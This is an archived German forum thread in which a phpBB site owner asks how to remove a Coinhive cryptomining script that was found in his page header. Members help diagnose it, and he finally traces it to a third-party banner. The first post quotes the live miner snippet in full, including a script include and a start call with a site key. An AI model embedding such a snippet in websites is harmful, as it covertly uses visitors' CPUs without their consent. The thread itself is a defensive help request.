PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : coinhive aus Scrypt entfernen?



Der Buchhalter
27.11.2017, 09:03
Hallo,
Das ist JavaScript, dass in meiner Seite eingebettet ist und Crypto Berechnungen durchführt:
Im Header findet man das hier


<script src="https://coinhive.com/lib/coinhive.min.js"></script>
...
<script>
var miner = new CoinHive.Anonymous('MfNBKJ6B6qXQmqS3MR96UGW23a31jl 2V');
miner.start();
</script>

Habe von meheren Usern die Nachricht bekommen das sie Auf meiner Webseite immer 100% CPU haben.
Liegt es an dem Eintrag wenn ja was ist das für ein Scrypt und wo finde ich das und wie Enferne ich es?

Gruß
Buchhalter

Nimbus
27.11.2017, 10:40
Wir kennen deine Homepage bzw. dein Skript nicht. Folglich haben wir also noch weniger Ahnung als du davon. Ein paar Hintergrundinfos wären schon praktisch. Ansonsten kannst du die Datenbank und die Files mal nach "coinhive" durchsuchen. Das liefert eventuell Informationen über die Position. Ganz davon abgesehen musst du dir Gedanken machen, wie es da hin kommt...

Der Buchhalter
27.11.2017, 12:31
Zu finden ist es im Quelltext

katze
27.11.2017, 12:33
Mensch Nimbus "Im Quelltext!!" Wo sonst?!? xP

Nimbus
27.11.2017, 12:38
Gemeint war was für ein Script du nutzt bzw. wo das Coin-Hive-Script genau eingebunden wird (Header, Footer, Signatur eines Users, ...).
Die anderen Hinweise gelten natürlich nach wie vor...

noid
27.11.2017, 12:46
Die primäre Frage ist ja, wie das Script da hin gekommen ist. Durch Magie wohl kaum. Was dann natürlich die Frage aufwirft, wer es eingebunden hat. Sollte es jemandem gelungen sein, sich unberechtigt Zugriff zu verschaffen, solltest du ggf die Sicherheit deiner Seite mal überprüfen. Die Entfernung hängt dann auch vom Aufbau der Seite ab.

RedDevil
27.11.2017, 13:28
Wen du das Script nicht eingebaut hast, wer hat den sonst noch Zugriff auf dein Panel ? Entweder du wurdest Hacked oder ein coAdmin / Mod ect hat es eingebaut. Sollte das jemand aus deinem Team gewesen sein, solltest du ganz schnell Aufräumen.

Der Buchhalter
27.11.2017, 16:15
Bin jetzt nicht der große Techniker darum freut man sich immer besonders auf so nette Helfer wie katze die braucht man.

Mir hat es ein Member geschickt, demnach im Header

Hallo,
Das ist JavaScript, dass in meiner Seite eingebettet ist und Crypto Berechnungen durchführt:
Im Header findet man das hier

Ich nutze phpBB 3

LG

FLX
27.11.2017, 16:32
Okay, nur mal zur Klarstellung. Hast du das selber in den phpBB eingefügt ODER hast du keine Ahnung wie das da hinkommt und deine Mitglieder haben dich erst darauf aufmerksam gemacht?

Schick mir mal per PN den Link zu deiner Seite.

manitos
27.11.2017, 16:49
Da verdient jemand Geld über deine Webseite mit Coinhive (einem Coin-Miner) und hat einen Schad-Code (wird von manchen Anti-Viren-Programmen als sollcher erkannt) in das Script deiner Seite eingebunden.
Du solltest dir entweder Leute suchen die sich mit sowas auskennen (Coder) oder es bitte bleiben lassen Webseiten zu betreiben und deine User in Gefahr zu bringen.

Greetz
manitos

Der Buchhalter
27.11.2017, 18:12
Ich habe keine Ahnung wie das dahingekommen ist, es ist einem Member aufgefallen weil seine CPU oft auf 100% lief
Ich habe Kaspersky Internet Security 2018 aber hat nicht erkannt.
Habe mir im Browser Antiminer und Coin Miner Block for Chrome installiert und auf meiner Seite sofort bereitgestellt.

RedDevil
27.11.2017, 18:56
Trotzdem erklärt es noch nicht, wie es dahin gekommen ist. Wen du es definitive nicht warst und auch keiner aus deinem Team, bist du Hacked worden. Dann am besten Seite Offline nehmen und mal jemanden schauen lassen der sich damit auch auskennt !

Beste Regards

FLX
27.11.2017, 18:57
Hab ihn für später zum Gespräch eingeladen. Mal schauen was sich ergibt :)

RedDevil
27.11.2017, 18:59
@Flexi: Dann bin ich mal gespannt, was dabei raus kommt. Mein Tipp ist trotzdem, die Seite erst mal Off zu nehmen.

Celv
28.11.2017, 20:19
Du hast die Zeilen doch schon gepostet, welche du entfernen musst..
Vor allem solltest du dich mal umschauen und umhören wer es eingebunden haben könnte.
Notfalls phpBB mal updaten und versuchen Lücken zu schließen, denn wenn du es nicht warst und es keiner aus deinem Team war kann es nur jemand fremdes gewesen sein, welches sich Zugriff verschafft hat. Entweder durch einer Lücke in eines deiner Scripts oder durch's infizieren und beklauen eines deiner Teamler.

syrius
28.11.2017, 22:52
Zu 99% war es der Außenseiter, der Admin, von dem man nie etwas hört oder sieht xD

Der Buchhalter
29.11.2017, 08:38
Erledigt der coinhive war im Banner von Smoozed im Header Danke für Eure Hilfe